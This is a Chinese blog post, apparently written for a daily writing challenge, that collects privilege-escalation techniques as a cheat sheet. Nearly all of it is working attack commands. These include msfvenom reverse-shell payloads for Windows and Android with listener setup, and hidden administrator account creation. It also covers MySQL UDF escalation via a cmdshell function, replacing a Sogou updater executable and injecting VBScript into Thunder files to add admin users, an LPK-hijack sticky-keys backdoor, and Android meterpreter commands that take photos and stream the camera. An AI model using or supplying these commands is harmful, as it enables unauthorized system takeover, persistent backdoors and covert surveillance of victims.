携手创作,共同成长!这是我参与「掘金日新计划 · 8 月更文挑战」的第23天,点击查看活动详情
基础提权
常用命令
whoami
net user
net user hack hack /add
net user hack$ hack /add 仅仅Net user是看不到的
net user localgroup administrators hack /add
tasklist /svc 查看远程连接的端口 寻找termservice pid
netstat -ano查看端口占用情况
msf生成木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.199.144 lport=12345 -f exe >test.exe //x64根据情况
开始监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.199.144
set lport 12345
exploit
https支持端口443 2053 2083 2096
cs生成木马
攻击->生成后门
Z1->信息收集->sharpAVKB(杀软和补丁对比)
getsystem
meterpreter的getsystem命令,实际是针对windows的管理员组的用户的一种提权方式,当用户不在管理员组时,我们通常会通过系统的溢出漏洞进行提权。而当所得用户权限在管理员组时,我们需要先绕过UAC,然后使用getsystem命令进行提权即可。
mysql提权
udf提权
必须是root权限
数据库信息一般存放在inc文件夹下,例config.php conn.php等
在有insert和delete权限后,就可以在mysql中创建函数 来攻击mysql
udf条件
mysql>5.1 mysql\lib\plugin
mysql<5.1 c:\windows
dll文件提权
上传udf.dll,进入shell.php,链接数据库,执行
在udfeval表中利用longblob创建二进制形式文本数据shellcode
create table udfeval(shellcode longblob);
将udf.dll内容传到udfeval中
insert into udfeval values(load_file("C:\udf.dll"));
再讲shellcode中udf.dll二进制内容传到mysql的plugin中
select shellcode from udfeval into dumpfile "C://phpstudy//MySQL//lib//plugin//udf.dll";
创建cmdshell函数
create function cmdshell returns string soname 'udf.dll';
命令执行
select cmdshell('whoami');
执行完毕后,若需恢复环境
#查看是否创建cmdshell函数
select * from mysql.func where name = 'cmdshell';
删除cmdshell函数
drop function cmdshell;
删除创建的udfeval表
drop table udfeval
udf.php提权
向目标路径导入udf.dll文件后,执行命令即可
第三方提权
搜狗输入法提权
通过注册表查看安装程序
shell.aspx ->RegShell ->HKEY_LOCAL_MACHINE\SOFTWARE\
发现安装路径
查看权限,everyone权限
搜狗中有个PinyinUp.exe更新程序可以替换掉进行提权
Quick Batch File Compiler 编写PinyinUp.exe程序
@echo off
@net user hack hack /add
@net localgroup administrators hack /add
编译后替换原文件中的PinyinUp.exe,更新词库,调用PinyinUp.ext
查看管理员组,发现加入hack账户
net localgroup administrators
LPK劫持
设置键1:65(A) 键2:83(S) 登录密码:admin 生成dll文件
放到navicat配置文件中
重启mysql服务,mstsc远程连接,按五下shift键,弹出框输入密码AS登录成功
Cmdshell->whoami发现system权限
安卓手机
生成apk文件
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.199.153 LPORT=4444 R > shell.apk
放入AndroidKiller修改APP名保存并编译
msf设置payload并监听
msfconsole
use exploit/multi/handler
设置payload
set payload android/meterpreter/reverse_tcp
set lhost 192.168.199.152
set lport 4444
查看配置
show options
运行
run
将shell.apk放入模拟器运行,监听到后执行命令
功能
sysinfo查看安卓版本
app_list 查看app
webcam_list 列出手机摄像头个数
webcam_snap 拍照
webcam_stream -i 1 开摄像头
迅雷提权
\Thunder\Program\目录下有两个htm文件,getAllurl.htm、geturl.htm
当我们使用迅雷下载东西的时候,会调用该文件文件,去激活htm文件里的我们写入的代码
htm文件加入如下代码,用迅雷下载后即可创建administrators组的一个用户
<script language="VBScript">
Set vbs=CreateObject("Wscript.Shell")
vbs.run "cmd /c net user hack hack /add",0
vbs.run "cmd /c net localgroup administrators hack/add",0
</script>
linux提权
ubuntu
uname -a查内核
cat /etc/*release
centos
uname -a查内核
rpm -qa |grep glibc 查看版本
exploit-db.com
nc监听
GNU glibc 动态链接器
